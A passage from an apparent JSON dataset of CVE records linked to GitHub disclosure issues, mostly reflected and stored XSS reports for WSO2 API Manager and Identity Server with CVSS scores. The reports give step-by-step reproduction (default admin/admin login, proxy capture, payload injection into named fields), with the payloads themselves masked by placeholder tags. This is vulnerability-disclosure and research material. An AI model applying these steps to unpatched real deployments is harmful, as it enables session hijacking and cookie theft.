  42167. "description": "An infinite loop and hang in APITAG Describe the bug An input file can result in an infinite loop and hang, with high CPU consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file. To Reproduce Steps to reproduce the behaviour: execute PATHTAG APITAG Observed behavior: an infinite loop and hang, with high CPU consumption FILETAG Additional context The poc is here FILETAG The code: > io_ APITAG > io_ APITAG APITAG leads to an infinite loop.",
  42168. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42169. "severity": "HIGH",
  42170. "baseScore": 7.5,
  42171. "impactScore": 3.6,
  42172. "exploitabilityScore": 3.9
  42173. },
  42174. {
  42175. "CVE_ID": "CVE-2019-20434",
  42176. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/17",
  42177. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/17",
  42178. "Repo_new": "cybersecurityworks/disclosed",
  42179. "Issue_Created_At": "2019-11-27T10:43:00Z",
  42180. "description": "Multiple Reflected Cross Site Scripting (XSS) in WSO2 Product APITAG Analytics Server Version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Multiple APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Data Analytics Server Product. APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Figure NUMBERTAG Access the APITAG URL APITAG FILETAG Figure NUMBERTAG Add new property. FILETAG Figure NUMBERTAG SS payload added to path variable and gets reflected in the response. FILETAG Figure NUMBERTAG Injected XSS payload gets reflected in the browser. FILETAG Figure NUMBERTAG SS payload added to name variable and gets reflected in the response. FILETAG Figure NUMBERTAG Injected XSS payload gets reflected in the browser. APITAG NUMBERTAG APITAG Access the GET request APITAG URL APITAG (added with XSS payload) directly to see XSS getting reflected in the browser. FILETAG Figure NUMBERTAG Access the APITAG URL APITAG to add new Data Source FILETAG Figure NUMBERTAG capturing the GET request and added XSS payload gets reflected in the response. FILETAG Figure NUMBERTAG Injected XSS payload, APITAG through vulnerable APITAG APITAG gets reflected whenever the user tries to access the APITAG URL. APITAG APITAG Steps APITAG APITAG NUMBERTAG APITAG NUMBERTAG Logon into data analytics server with given credentials (admin/admin in localhost) in the APITAG URL APITAG APITAG IP NUMBERTAG Now, access the APITAG URL APITAG NUMBERTAG Add new property and capture the request in proxy and send it to repeater NUMBERTAG Add XSS payload APITAG to APITAG path & name APITAG variable one by one NUMBERTAG Then, the Injected XSS Payload APITAG will get reflected in the response. 
APITAG NUMBERTAG APITAG NUMBERTAG Logon into data analytics server with given credentials (admin/admin in localhost) in the APITAG URL APITAG APITAG IP NUMBERTAG Now, access the APITAG URL APITAG to add new Data Source with encoded XSS payload APITAG and submit the data which gets reflected in the browser NUMBERTAG Or access the APITAG URL APITAG (added with XSS payload) directly to see XSS getting reflected in the browser. APITAG APITAG NUMBERTAG Discovered in WSO2 Data Analytics Server Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got response from WSO2 security team, \"We are looking into the issues you have reported. We will keep you posted regarding the progress of our evaluation of them NUMBERTAG Got mail confirming the APITAG NUMBERTAG APITAG and rejecting the APITAG NUMBERTAG APITAG are not a valid issue NUMBERTAG Customer Announcement End of July, Public Announcement: End of August NUMBERTAG Customer Announcement is done. Public Announcement is scheduled NUMBERTAG Public Announcement is done. Please refer NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42181. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42182. "severity": "MEDIUM",
  42183. "baseScore": 4.8,
  42184. "impactScore": 2.7,
  42185. "exploitabilityScore": 1.7
  42186. },
  42187. {
  42188. "CVE_ID": "CVE-2019-20435",
  42189. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/18",
  42190. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/18",
  42191. "Repo_new": "cybersecurityworks/disclosed",
  42192. "Issue_Created_At": "2019-11-27T12:00:44Z",
  42193. "description": "Reflected Cross Site Scripting (XSS) in WSO2 Product WSO2 API Manager version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager Product. APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG APITAG Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) POST request APITAG variable is vulnerable to reflected cross site scripting (XSS) in the URL, FILETAG FILETAG Figure NUMBERTAG New document created in the API FILETAG Figure NUMBERTAG Choose APITAG Content\u2019 to edit document information. FILETAG Figure NUMBERTAG Actual GET request APITAG URL APITAG FILETAG Figure NUMBERTAG APITAG Crafted request APITAG with XSS payload, ERRORTAG gets reflected in the same browser as response. APITAG Steps APITAG NUMBERTAG Login to the application APITAG (admin/admin) APITAG through the login APITAG URL. APITAG NUMBERTAG Go to API APITAG APITAG APITAG section in the created API NUMBERTAG APITAG APITAG New document\u2019 APITAG details and submit it NUMBERTAG Go to APITAG APITAG Content\u2019 APITAG available to edit the document details NUMBERTAG Modify the APITAG URL APITAG variable, APITAG with a XSS payload, ERRORTAG NUMBERTAG Now, click on the APITAG crafted URL APITAG to execute the injected XSS payload every time. 
APITAG APITAG NUMBERTAG Discovered in WSO2 API Manager Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for reporting the issue. We'll look into this and get back to you. Appreciate your continued support NUMBERTAG Customer Announcement End of July, Public Announcement: End of August NUMBERTAG Customer Announcement is done. Public Announcement is scheduled NUMBERTAG Customer Announcement is done. Public Announcement is scheduled at the end of September. [postponed to September due to internal reasons NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42194. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42195. "severity": "MEDIUM",
  42196. "baseScore": 4.8,
  42197. "impactScore": 2.7,
  42198. "exploitabilityScore": 1.7
  42199. },
  42200. {
  42201. "CVE_ID": "CVE-2019-20436",
  42202. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/19",
  42203. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/19",
  42204. "Repo_new": "cybersecurityworks/disclosed",
  42205. "Issue_Created_At": "2019-11-29T10:51:10Z",
  42206. "description": "Stored Cross Site Scripting (XSS) in WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG dialect APITAG AFFECTED PRODUCTS NUMBERTAG WSO2 API Manager NUMBERTAG WSO2 API Manager Analytics NUMBERTAG WSO2 IS as Key Manager NUMBERTAG WSO2 Identity Server NUMBERTAG WSO2 Identity Server Analytics Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) POST request dialect variable is vulnerable to stored cross site scripting (XSS) in the URL, FILETAG Figure NUMBERTAG Adding XSS payload to dialect variable Figure NUMBERTAG Added XSS payload, APITAG gets stored Figure NUMBERTAG Edit the service provider information Figure NUMBERTAG Select the XSS payload stored in the claims Figure NUMBERTAG Add Service Provider Claim Dialect URI by selecting the stored URI value from claims Figure NUMBERTAG Injected XSS payload gets executed in the browser after adding claims. APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG APITAG Add APITAG Dialect URI Value to the POST Request APITAG URL, APITAG in the dialect variable NUMBERTAG Now, Go to APITAG Service Provider section. 
APITAG NUMBERTAG Create new service provider information or APITAG edit APITAG an existing Service Provider information APITAG its XSS NUMBERTAG Select Service Provider Claim Dialect in the given list of details and click on APITAG button to see the injected XSS payload gets executed in the browser. APITAG APITAG NUMBERTAG Discovered in WSO2 API Manager Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for reporting the issue. We'll look into this and get back to you. Appreciate your continued support NUMBERTAG Customer Announcement End of July, Public Announcement: End of August NUMBERTAG Customer Announcement is done. Public Announcement is scheduled NUMBERTAG Customer Announcement is done. Public Announcement is scheduled at the end of September. [postponed to September due to internal reasons NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42207. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42208. "severity": "MEDIUM",
  42209. "baseScore": 6.1,
  42210. "impactScore": 2.7,
  42211. "exploitabilityScore": 2.8
  42212. },
  42213. {
  42214. "CVE_ID": "CVE-2019-20437",
  42215. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/20",
  42216. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/20",
  42217. "Repo_new": "cybersecurityworks/disclosed",
  42218. "Issue_Created_At": "2019-11-29T11:09:28Z",
  42219. "description": "Stored Cross Site Scripting (XSS) in APITAG Type\" variable on WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG dialect APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Adding XSS payload to dialect variable FILETAG Figure NUMBERTAG Added XSS payload, APITAG gets stored FILETAG Figure NUMBERTAG Edit the service provider information FILETAG Figure NUMBERTAG Select the XSS payload stored in the claims FILETAG Figure NUMBERTAG Add Service Provider Claim Dialect URI by selecting the stored URI value from claims FILETAG Figure NUMBERTAG Injected XSS payload gets executed in the browser after adding claims. APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG APITAG Add APITAG Dialect URI Value to the POST Request APITAG URL, APITAG in the dialect variable NUMBERTAG Now, Go to APITAG Service Provider section. APITAG NUMBERTAG Create new service provider information or APITAG edit APITAG an existing Service Provider information APITAG its XSS NUMBERTAG Select Service Provider Claim Dialect in the given list of details and click on APITAG button to see the injected XSS payload gets executed in the browser. APITAG APITAG NUMBERTAG Discovered in WSO2 API Manager Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for the latest analysis on WSO2 Identity Server. 
We'll do the review on this and get back to you soon NUMBERTAG Got mail from WSO2 team saying, APITAG issues reported in Identity Server are under the analyzing state NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement Done. Public Announcement is scheduled at the end of September NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42220. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42221. "severity": "MEDIUM",
  42222. "baseScore": 6.1,
  42223. "impactScore": 2.7,
  42224. "exploitabilityScore": 2.8
  42225. },
  42226. {
  42227. "CVE_ID": "CVE-2019-20438",
  42228. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/22",
  42229. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/22",
  42230. "Repo_new": "cybersecurityworks/disclosed",
  42231. "Issue_Created_At": "2020-01-17T12:35:46Z",
  42232. "description": "Stored Cross Site Scripting (XSS) in 'inline API documentation editor page' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Choose APITAG Content\u201d after creating a document FILETAG Figure NUMBERTAG Clicked on APITAG to add XSS payload FILETAG Figure NUMBERTAG Use APITAG button to Save the document with added \u201cXSS Payload\u201d FILETAG Figure NUMBERTAG Saving and clicking on APITAG back stores the XSS payload and executes in the browser FILETAG Figure NUMBERTAG The stored XSS payload gets executed whenever the user loads the APITAG page, APITAG APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Create an API and navigate to doc tag to APITAG APITAG new document\u201d APITAG NUMBERTAG Click on APITAG APITAG content\u201d APITAG after creating a valid document NUMBERTAG Edit the document content value in \u201ccontent\u201d variable with XSS payload, APITAG APITAG NUMBERTAG Now, Whenever the user loads the APITAG page APITAG the stored XSS payload gets executed in the browser. APITAG APITAG NUMBERTAG Discovered in APITAG APITAG APITAG NUMBERTAG Reported to APITAG intigriti APITAG platform NUMBERTAG Closed the issue in APITAG intigriti APITAG platform saying it as \"out of scope NUMBERTAG Discovered in WSO2 API Manager version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your continuous effort on analyzing security vulnerabilities on WSO2 products. 
We will evaluate your finding and get back to you as soon as possible with our feedback NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42233. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42234. "severity": "MEDIUM",
  42235. "baseScore": 4.8,
  42236. "impactScore": 2.7,
  42237. "exploitabilityScore": 1.7
  42238. },
  42239. {
  42240. "CVE_ID": "CVE-2019-20439",
  42241. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/21",
  42242. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/21",
  42243. "Repo_new": "cybersecurityworks/disclosed",
  42244. "Issue_Created_At": "2019-12-24T10:37:12Z",
  42245. "description": "Reflected Cross Site Scripting (XSS) in 'roles' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Reflected APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Start creating an API FILETAG Figure NUMBERTAG Click on Add Scope button to add resources information FILETAG Figure NUMBERTAG Enter XSS Payload in Roles section FILETAG Figure NUMBERTAG Injected XSS payload, ERRORTAG gets reflected in the same browser as response. APITAG Steps APITAG NUMBERTAG Login to the application (admin/admin) through the login APITAG URL. APITAG NUMBERTAG Go to APITAG Design API page APITAG to create API NUMBERTAG Fill the details up to APITAG manage page. APITAG NUMBERTAG Choose Add Scope to include resources information NUMBERTAG Add XSS payload, ERRORTAG in Roles column NUMBERTAG Clicking on Add Scope button executes the injected XSS Payload. APITAG APITAG NUMBERTAG Discovered in WSO2 Identity Server NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your continuous effort on analysing security vulnerabilities on WSO2 products. We will evaluate your finding and get back to you as soon as possible with our feedback NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. 
Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42246. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42247. "severity": "MEDIUM",
  42248. "baseScore": 4.8,
  42249. "impactScore": 2.7,
  42250. "exploitabilityScore": 1.7
  42251. },
  42252. {
  42253. "CVE_ID": "CVE-2019-20440",
  42254. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/24",
  42255. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/24",
  42256. "Repo_new": "cybersecurityworks/disclosed",
  42257. "Issue_Created_At": "2020-01-20T09:44:04Z",
  42258. "description": "Multiple Reflected Cross Site Scripting (XSS) in APITAG 'version' and APITAG of created API document using XSS payload' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Multiple reflected APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS NUMBERTAG WSO2 API Manager Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) The following Vulnerability is tested on WSO2 API Manager version NUMBERTAG Product. Issue NUMBERTAG Multiple reflected cross site scripting: Figure NUMBERTAG Update the existing document information created. (here API Name is \u2018reflected XSS\u2019) Figure NUMBERTAG Add XSS payload to the variable APITAG Figure NUMBERTAG HTTP Response for the modified APITAG variable with XSS payload. Figure NUMBERTAG Injected XSS payload, APITAG APITAG gets reflected in the browser response. Issue NUMBERTAG Figure NUMBERTAG Injected XSS payload in variable APITAG version and APITAG gets reflected in the Response Figure NUMBERTAG Injected payload gets reflected in the browser THREE times (THREE places) Figure NUMBERTAG Page Looks after executing the injected XSS payload APITAG Steps APITAG NUMBERTAG Login to the application (admin/admin) through the login APITAG URL. 
APITAG NUMBERTAG Go to the APITAG page APITAG where an API is already created NUMBERTAG Create a document for the created API by clicking on APITAG New Document\u201d button NUMBERTAG Created documents are listed as shown in figure NUMBERTAG Click on APITAG button to update document information NUMBERTAG Add relevant information and capture the request in proxy to add XSS payload APITAG APITAG \u201d in APITAG variable NUMBERTAG Now, Injected XSS payload gets executed in the browser. Note: Similarly, add XSS payload to the other vulnerable variables \u201cversion\u201d and APITAG which reflects in the browser. APITAG APITAG NUMBERTAG Discovered in APITAG APITAG APITAG NUMBERTAG Reported to APITAG intigriti APITAG platform NUMBERTAG Closed the issue in APITAG intigriti APITAG platform saying it as \"out of scope NUMBERTAG Reported to EMAILTAG NUMBERTAG Got response from WSO2 security team, APITAG you for reaching out to WSO2 Platform Security Team. We will evaluate your finding and get back to you as soon as possible with our feedback NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. 
Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42259. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42260. "severity": "MEDIUM",
  42261. "baseScore": 4.8,
  42262. "impactScore": 2.7,
  42263. "exploitabilityScore": 1.7
  42264. },
  42265. {
  42266. "CVE_ID": "CVE-2019-20441",
  42267. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/23",
  42268. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/23",
  42269. "Repo_new": "cybersecurityworks/disclosed",
  42270. "Issue_Created_At": "2020-01-20T07:37:31Z",
  42271. "description": "Stored Cross Site Scripting (XSS) in ' HTTP POST request with a harmful request parameter for context' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Design an API with valid values in the required fields of the page FILETAG Figure NUMBERTAG Click on APITAG Implement\u201d after completing the forms with valid information FILETAG Figure NUMBERTAG alid HTTP Request captured in the proxy with filled information FILETAG Figure NUMBERTAG APITAG variable is added with XSS Payload, APITAG APITAG FILETAG Figure NUMBERTAG Submitted the API details to the server with XSS payload FILETAG Figure NUMBERTAG SS Payload gets stored and reflects whenever the user views the APITAG page. APITAG FILETAG Figure NUMBERTAG Stored XSS payload in the source code APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to the APITAG URL APITAG for creating an API NUMBERTAG Fill all the required information and click on APITAG Implement NUMBERTAG Capture the HTTP request in the proxy and add XSS payload APITAG APITAG \u201d to the \u201ccontext\u201d variable NUMBERTAG Deploy the prototype with added XSS payload NUMBERTAG Injected XSS payload gets reflected whenever the user visits or reloads the APITAG page. APITAG APITAG APITAG NUMBERTAG Discovered in APITAG APITAG APITAG NUMBERTAG Reported to APITAG intigriti APITAG platform NUMBERTAG Closed the issue in APITAG intigriti APITAG platform saying it as \"out of scope NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for sending new issues. 
Let us evaluate them and get back to you with the results NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42272. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42273. "severity": "MEDIUM",
  42274. "baseScore": 4.8,
  42275. "impactScore": 2.7,
  42276. "exploitabilityScore": 1.7
  42277. },
  42278. {
  42279. "CVE_ID": "CVE-2019-20442",
  42280. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/25",
  42281. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/25",
  42282. "Repo_new": "cybersecurityworks/disclosed",
  42283. "Issue_Created_At": "2020-01-20T11:16:47Z",
  42284. "description": "Stored Cross Site Scripting (XSS) in APITAG variable | WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Choose APITAG APITAG APITAG from the Registry option FILETAG Figure NUMBERTAG Select any on APITAG and add APITAG APITAG APITAG from APITAG section in the same page. FILETAG Figure NUMBERTAG Capture the POST request in burp suite proxy and add XSS payload, ERRORTAG to APITAG variable FILETAG Figure NUMBERTAG Injected XSS Payload gets stored and executed in the browser FILETAG Figure NUMBERTAG The stored XSS payload gets executed whenever the user loads the page APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG Select any on APITAG and add APITAG APITAG APITAG from APITAG section in the same page NUMBERTAG Capture the POST request in burp suite proxy and add XSS payload, ERRORTAG to APITAG variable NUMBERTAG Now the injected XSS payload gets stored and executes whenever the user loads the page. APITAG APITAG NUMBERTAG Discovered in APITAG Version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your analysis report. We will evaluate your finding and get back to you soon with our feedback NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement Done. Public Announcement is scheduled at the end of September NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Got mail saying, APITAG Announcement is done. 
Public Announcement is scheduled at end of November NUMBERTAG Got mail saying, \"We have done the public announcement for the remaining two issues. Kindly note that we have aggregated the following two issues NUMBERTAG Got mail saying, \"... stored XSS issues APITAG No NUMBERTAG Document No NUMBERTAG were reported in registry UI. After analyzing the impact, CVSS Score and fix for the above two issues, we decided to deliver the fix with the same advisory id and patch since the issues could be fixed in the same component. ...\" Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42285. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42286. "severity": "MEDIUM",
  42287. "baseScore": 4.8,
  42288. "impactScore": 2.7,
  42289. "exploitabilityScore": 1.7
  42290. },
  42291. {
  42292. "CVE_ID": "CVE-2019-20443",
